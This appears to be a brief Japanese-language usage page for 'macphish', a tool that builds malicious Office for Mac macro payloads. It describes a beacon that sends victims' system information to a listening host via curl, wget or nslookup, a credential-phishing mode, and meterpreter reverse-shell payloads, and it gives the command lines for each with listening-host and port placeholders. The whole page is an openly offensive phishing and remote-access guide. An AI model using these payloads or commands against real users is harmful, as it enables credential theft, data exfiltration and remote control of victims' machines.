Office for Mac Macro Payload Generator

利用可能な攻撃ベクトルは4つです:
'creds'メソッドの場合、macphishはApplescriptスクリプトを直接生成できます。シェルから実行する必要がある場合に便利です。
実行時、このペイロードはリスニングホストに信号を送り、被害者に関する基本的なシステム情報を提供します。ビーコンペイロードを生成する最も簡単な方法は次のとおりです:
$./macphish.py -lh <listening host>
デフォルトではcurlを使用しますが、コマンドテンプレートを変更することで他のユーティリティ(wget、nslookup)も使用できます。
$./macphish.py -lh <listening host> -lp <listening port> -a creds
meterpreterペイロードを生成する最も簡単な方法は次のとおりです:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter
最初にGrantAccessToMultipleFiles()を呼び出すmeterpreterペイロードを生成するには:
$./macphish.py -lh <listening host> -lp <listening port> -p <payload> -a meterpreter-grant
meterpreter攻撃では、現時点ではPythonペイロードのみがサポートされています。
詳細は https://github.com/cldrn/macphish/wiki/Usage を参照してください。